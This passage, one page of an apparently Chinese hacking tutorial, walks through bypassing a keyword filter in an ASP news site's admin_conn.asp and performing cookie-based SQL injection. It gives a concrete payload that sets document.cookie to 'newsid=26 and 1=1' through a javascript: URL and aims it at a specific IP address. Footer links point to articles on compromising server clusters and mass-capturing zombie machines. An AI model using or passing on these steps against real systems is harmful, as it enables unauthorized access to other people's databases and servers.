然后,我们在admin_conn.asp 文件中发现如下代码:
sss=LCase(request.servervariables("QUERY_STRING"))
if instr(sss,"select")<>0 or instr(sss,"inster")<>0 or instr(sss,"delete")<>0 or instr(sss,"(")<>0 or instr(sss,"’or")<>0 then
response.write "<BR><BR><center>你的网址不合法"
response.end
end if
过滤了request.querystring方法获取从客户端传来的数据,过滤的内容是select,inster,delete等。虽然做了这个限制,但是我们还是可以利用cookie进行注入,因为前面的漏洞代码里面用的是request而不是request.querystring,所以我们还有reuqest.cookie方法让服务端获取我们这里的数据。
先访问:http://222.90.4.20/news/admin_news_view.asp?newsid=26,然后去掉此URL,再 提交:javascript:alert(document.cookie="newsid="+escape("26 and 1=1"))返回如图2所示:
然后在访问http://222.90.4.20/news/admin_news_view.asp,返回如图3:
上一页 1 2 3 4 5 6 下一页
·上一篇: 整个服务器群的沦陷:一次曲折的安全检测
·下一篇: 135批量抓肉鸡 批量开TELNET
|
